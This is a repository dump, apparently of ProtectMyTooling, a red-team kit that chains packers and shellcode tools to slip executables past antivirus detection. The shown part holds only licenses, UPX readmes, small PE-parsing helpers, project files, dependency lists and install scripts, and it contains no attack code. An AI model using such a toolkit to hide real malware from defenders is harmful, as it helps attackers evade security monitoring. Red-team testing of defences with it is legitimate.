15 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
16 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
17 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
18 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
19 | SOFTWARE.
20 |
--------------------------------------------------------------------------------
/contrib/pe_tools/VERSION:
--------------------------------------------------------------------------------
1 | 0.3
--------------------------------------------------------------------------------
/contrib/pe_tools/pe_tools/__init__.py:
--------------------------------------------------------------------------------
1 | from .pe_parser import *
2 | from .rsrc import *
3 | from .version_info import parse_version_info
4 |
--------------------------------------------------------------------------------
/contrib/pe_tools/pe_tools/__pycache__/peresed.cpython-310.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/pe_tools/pe_tools/__pycache__/peresed.cpython-310.pyc
--------------------------------------------------------------------------------
/contrib/pe_tools/pe_tools/utils.py:
--------------------------------------------------------------------------------
def align4(val):
    """Round ``val`` up to the next multiple of 4 (aligned values are returned unchanged)."""
    # Overshoot by alignment-1, then drop the two low bits that make up the remainder.
    bumped = val + 3
    return bumped - (bumped & 3)
3 |
def align8(val):
    """Round ``val`` up to the next multiple of 8 (aligned values are returned unchanged)."""
    # Overshoot by alignment-1, then drop the three low bits that make up the remainder.
    bumped = val + 7
    return bumped - (bumped & 7)
6 |
def align16(val):
    """Round ``val`` up to the next multiple of 16 (aligned values are returned unchanged)."""
    # Overshoot by alignment-1, then drop the four low bits that make up the remainder.
    bumped = val + 15
    return bumped - (bumped & 15)
9 |
--------------------------------------------------------------------------------
/contrib/pe_tools/setup.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 |
4 | from setuptools import setup
5 | import os
6 |
# Read the package version from the VERSION file that sits next to this
# script and tag it as a local build.
top = os.path.dirname(__file__)
with open(os.path.join(top, 'VERSION'), 'r') as fin:
    version = '{version}'.format(version=fin.read().strip() + '+local')

# NOTE(review): 'grope' is declared without a version constraint, so whatever
# release the package index serves at install time is what gets installed.
package_info = {
    'name': 'pe_tools',
    'version': version,

    'url': 'https://github.com/avast/pe_tools',
    'maintainer': 'Martin Vejnár',
    'maintainer_email': 'martin.vejnar@avast.com',

    'packages': ['pe_tools'],
    'install_requires': ['grope'],

    # Exposes pe_tools.peresed:main as the `peresed` command.
    'entry_points': {
        'console_scripts': [
            'peresed = pe_tools.peresed:main',
        ],
    },
}

setup(**package_info)
29 |
--------------------------------------------------------------------------------
/contrib/sRDI/Python.pyproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | Debug
5 | 2.0
6 | be642266-f34d-43c3-b6e4-eebf8e489519
7 |
8 |
9 |
10 |
11 |
12 |
13 | .
14 | .
15 | Python
16 | RDIShellcodePyLoader
17 |
18 |
19 | true
20 | false
21 |
22 |
23 | true
24 | false
25 |
26 |
27 | 10.0
28 |
29 |
30 |
31 |
32 |
33 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
--------------------------------------------------------------------------------
/contrib/sgn/LICENSE:
--------------------------------------------------------------------------------
1 | MIT License
2 |
3 | Copyright (c) 2019 Ege Balcı
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining a copy
6 | of this software and associated documentation files (the "Software"), to deal
7 | in the Software without restriction, including without limitation the rights
8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 |
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 |
--------------------------------------------------------------------------------
/contrib/sgn/keystone.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/sgn/keystone.dll
--------------------------------------------------------------------------------
/contrib/sgn/sgn.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/sgn/sgn.exe
--------------------------------------------------------------------------------
/contrib/upx/upx-3.96-amd64_linux/README.1ST:
--------------------------------------------------------------------------------
1 | ooooo ooo ooooooooo. ooooooo ooooo
2 | `888' `8' `888 `Y88. `8888 d8'
3 | 888 8 888 .d88' Y888..8P
4 | 888 8 888ooo88P' `8888'
5 | 888 8 888 .8PY888.
6 | `88. .8' 888 d8' `888b
7 | `YbodP' o888o o888o o88888o
8 |
9 |
10 | The Ultimate Packer for eXecutables
11 | Copyright (c) 1996-2020 Markus Oberhumer, Laszlo Molnar & John Reiser
12 | https://upx.github.io
13 |
14 |
15 | MAJOR NEWS IN UPX 3
16 | ===================
17 |
18 | The main news since UPX 2 are:
19 |
20 | * new format: added support for linux elf/arm
21 |
22 | * better compression using the LZMA algorithm (option '--lzma')
23 |
24 | * better support for MacOS
25 |
--------------------------------------------------------------------------------
/contrib/upx/upx-3.96-amd64_linux/upx:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/upx/upx-3.96-amd64_linux/upx
--------------------------------------------------------------------------------
/contrib/upx/upx-3.96-i386_linux/README.1ST:
--------------------------------------------------------------------------------
1 | ooooo ooo ooooooooo. ooooooo ooooo
2 | `888' `8' `888 `Y88. `8888 d8'
3 | 888 8 888 .d88' Y888..8P
4 | 888 8 888ooo88P' `8888'
5 | 888 8 888 .8PY888.
6 | `88. .8' 888 d8' `888b
7 | `YbodP' o888o o888o o88888o
8 |
9 |
10 | The Ultimate Packer for eXecutables
11 | Copyright (c) 1996-2020 Markus Oberhumer, Laszlo Molnar & John Reiser
12 | https://upx.github.io
13 |
14 |
15 | MAJOR NEWS IN UPX 3
16 | ===================
17 |
18 | The main news since UPX 2 are:
19 |
20 | * new format: added support for linux elf/arm
21 |
22 | * better compression using the LZMA algorithm (option '--lzma')
23 |
24 | * better support for MacOS
25 |
--------------------------------------------------------------------------------
/contrib/upx/upx-3.96-i386_linux/upx:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/upx/upx-3.96-i386_linux/upx
--------------------------------------------------------------------------------
/contrib/upx/upx-3.96-win32/README.1ST:
--------------------------------------------------------------------------------
1 | ooooo ooo ooooooooo. ooooooo ooooo
2 | `888' `8' `888 `Y88. `8888 d8'
3 | 888 8 888 .d88' Y888..8P
4 | 888 8 888ooo88P' `8888'
5 | 888 8 888 .8PY888.
6 | `88. .8' 888 d8' `888b
7 | `YbodP' o888o o888o o88888o
8 |
9 |
10 | The Ultimate Packer for eXecutables
11 | Copyright (c) 1996-2020 Markus Oberhumer, Laszlo Molnar & John Reiser
12 | https://upx.github.io
13 |
14 |
15 | MAJOR NEWS IN UPX 3
16 | ===================
17 |
18 | The main news since UPX 2 are:
19 |
20 | * new format: added support for linux elf/arm
21 |
22 | * better compression using the LZMA algorithm (option '--lzma')
23 |
24 | * better support for MacOS
25 |
--------------------------------------------------------------------------------
/contrib/upx/upx-3.96-win32/upx.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/upx/upx-3.96-win32/upx.exe
--------------------------------------------------------------------------------
/contrib/upx/upx-3.96-win64/README.1ST:
--------------------------------------------------------------------------------
1 | ooooo ooo ooooooooo. ooooooo ooooo
2 | `888' `8' `888 `Y88. `8888 d8'
3 | 888 8 888 .d88' Y888..8P
4 | 888 8 888ooo88P' `8888'
5 | 888 8 888 .8PY888.
6 | `88. .8' 888 d8' `888b
7 | `YbodP' o888o o888o o88888o
8 |
9 |
10 | The Ultimate Packer for eXecutables
11 | Copyright (c) 1996-2020 Markus Oberhumer, Laszlo Molnar & John Reiser
12 | https://upx.github.io
13 |
14 |
15 | MAJOR NEWS IN UPX 3
16 | ===================
17 |
18 | The main news since UPX 2 are:
19 |
20 | * new format: added support for linux elf/arm
21 |
22 | * better compression using the LZMA algorithm (option '--lzma')
23 |
24 | * better support for MacOS
25 |
--------------------------------------------------------------------------------
/contrib/upx/upx-3.96-win64/THANKS:
--------------------------------------------------------------------------------
1 | ooooo ooo ooooooooo. ooooooo ooooo
2 | `888' `8' `888 `Y88. `8888 d8'
3 | 888 8 888 .d88' Y888..8P
4 | 888 8 888ooo88P' `8888'
5 | 888 8 888 .8PY888.
6 | `88. .8' 888 d8' `888b
7 | `YbodP' o888o o888o o88888o
8 |
9 |
10 | The Ultimate Packer for eXecutables
11 | Copyright (c) 1996-2020 Markus Oberhumer, Laszlo Molnar & John Reiser
12 | https://upx.github.io
13 |
14 |
15 | .___.. .
16 | | |_ _.._ ;_/ __
17 | | [ )(_][ )| \_)
18 | --------------------
19 |
20 | UPX would not be what it is today without the invaluable help of
21 | everybody who was kind enough to spend time testing it, using it
22 | in applications and reporting bugs.
23 |
24 | The following people made especially gracious contributions of their
25 | time and energy in helping to track down bugs, add new features, and
26 | generally assist in the UPX maintainership process:
27 |
28 | Adam Ierymenko
29 | for severals ideas for the Linux version
30 | Andi Kleen and Jamie Lokier
31 | for the /proc/self/fd/X and other Linux suggestions
32 | Andreas Muegge
33 | for the Win32 GUI
34 | Atli Mar Gudmundsson
35 | for several comments on the win32/pe stub
36 | Charles W. Sandmann
37 | for the idea with the stubless decompressor in djgpp2/coff
38 | Ice
39 | for debugging the PE headersize problem down
40 | Joergen Ibsen and d'b
41 | for the relocation & address optimization ideas
42 | John S. Fine
43 | for the new version of the dos/exe decompressor
44 | Lukundoo
45 | for beta testing
46 | Michael Devore
47 | for initial dos/exe device driver support
48 | Oleg V. Volkov
49 | for various FreeBSD specific informations
50 | The Owl & G-RoM
51 | for the --compress-icons fix
52 | Ralph Roth
53 | for reporting several bugs
54 | Salvador Eduardo Tropea
55 | for beta testing
56 | Stefan Widmann
57 | for the win32/pe TLS callback support
58 | The WINE project (http://www.winehq.com/)
59 | for lots of useful information found in their PE loader sources
60 | Natascha
61 |
62 |
--------------------------------------------------------------------------------
/contrib/upx/upx-3.96-win64/upx.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/contrib/upx/upx-3.96-win64/upx.exe
--------------------------------------------------------------------------------
/images/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/images/1.png
--------------------------------------------------------------------------------
/images/3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/images/3.png
--------------------------------------------------------------------------------
/images/4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/images/4.png
--------------------------------------------------------------------------------
/images/5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/images/5.png
--------------------------------------------------------------------------------
/images/options.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/images/options.png
--------------------------------------------------------------------------------
/install.ps1:
--------------------------------------------------------------------------------
1 |
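# Installs ProtectMyTooling's dependencies on Windows.
#
# Steps: Python packages from requirements.txt, Nim packages via nimble plus
# the bundled denim.exe setup (only when nim.exe is on PATH), and the Linux
# side through WSL (only when bash.exe is on PATH).
#
# Every repository file (requirements.txt, contrib\denim\denim.exe, install.sh)
# is addressed relative to the directory holding this script rather than the
# caller's working directory, so a same-named file sitting in an unrelated
# current directory is never installed from or executed by accident.
#
# NOTE(review): requirements.txt is mostly unpinned, denim.exe is a binary
# shipped in the repository, and install.sh runs sudo inside WSL; review all
# three before running this on a workstation.

# $PSScriptRoot is empty when these lines run outside a script file; fall back
# to the current location in that case (the previous behaviour).
$repoRoot = if ($PSScriptRoot) { $PSScriptRoot } else { (Get-Location).Path }
Push-Location -LiteralPath $repoRoot
try
{
    Write-Host "`n== Step 1: Installing pip3 dependencies...`n" -ForegroundColor cyan
    pip3 install -r requirements.txt

    # $null goes on the left so the test stays a scalar comparison even if
    # Get-Command hands back a collection.
    if ($null -eq (Get-Command "python2" -ErrorAction SilentlyContinue))
    {
        Write-Host "`nWARNING: Some packers work only on Python2 which you seem to not have installed. Consider installing it to use: peCloakCapstone`n" -ForegroundColor yellow
    }

    if ($null -eq (Get-Command "nim.exe" -ErrorAction SilentlyContinue))
    {
        Write-Host "`nERROR: For Nim-related packers to work, you need to install Nim on your Windows! Consider using Chocolatey manager: choco install nim -y`n" -ForegroundColor green
    }
    else
    {
        Write-Host "`n== Step 2a: Installs nim dependencies...`n" -ForegroundColor cyan
        nimble -y install winim nimcrypto docopt ptr_math strenc

        Write-Host "`n== Step 2b: Installs denim.exe (github.com/moloch--/denim) dependencies...`n" -ForegroundColor cyan
        .\contrib\denim\denim.exe setup
    }

    if ($null -eq (Get-Command "bash.exe" -ErrorAction SilentlyContinue))
    {
        Write-Host "`nWARNING: You don't seem to have Bash.exe in your Windows (no WSL installed?). Some linux-native packers might not work: ScareCrow`n" -ForegroundColor green
    }
    else
    {
        Write-Host "`n`n== Step 3: Installing Linux dependencies (via WSL bash.exe). You'll be asked for sudo password...`n`n" -ForegroundColor cyan
        # install.sh is converted to LF line endings first, then executed by WSL bash.
        bash.exe -c "sudo apt install -y dos2unix ; dos2unix install.sh"
        bash.exe install.sh
    }

    Write-Host "`n`nOK: You should be all set now.`n"
    Write-Host "`nEnjoy ProtectMyTooling - and let me know the coolest/most effective packers-chain you come up with! :-)`n" -ForegroundColor green
}
finally
{
    # Restore the caller's location even if a step throws.
    Pop-Location
}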
36 |
--------------------------------------------------------------------------------
/install.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 |
# Refresh the package lists, then upgrade every installed package.
# NOTE(review): the upgrade is system-wide, not limited to the packages this
# project needs - confirm that is acceptable on the target machine.
sudo apt update
sudo apt upgrade -y

# Toolchain packages, pinned to exact versions.
# NOTE(review): each pinned version must exist in the configured apt sources,
# and the name 'mingw-64' should be checked against the target distribution
# (Debian/Ubuntu ship the toolchain as 'mingw-w64').
apt_packages=(
    'python3'
    'python3-dev'
    'nim=1.6.2'
    'mingw-64=8.0.0-1'
    'golang=2:1.18~3'
)
sudo apt install "${apt_packages[@]}" -y

# Python dependencies; requirements.txt is resolved against the current directory.
pip3 install -r requirements.txt

# Nim libraries, installed without version constraints.
nim_packages=(nimcrypto docopt ptr_math strenc winim)
nimble install "${nim_packages[@]}"
12 |
--------------------------------------------------------------------------------
/lib/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/lib/__init__.py
--------------------------------------------------------------------------------
/packers/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mgeeky/ProtectMyTooling/60a2c27c3f4c740b5f1a2400e15f5064f9dbfa51/packers/__init__.py
--------------------------------------------------------------------------------
/requirements.txt:
--------------------------------------------------------------------------------
1 | pyyaml
2 | pefile
3 | capstone
4 | pythonnet==3.0.0a2
5 | pe_tools
6 | capstone
7 | keystone-engine
8 | pycryptodome
9 | argparse
10 | PrettyTable
11 | PySimpleGUI
12 | clipboard
13 | colorama
14 | yara-python
15 | donut-shellcode
16 |
--------------------------------------------------------------------------------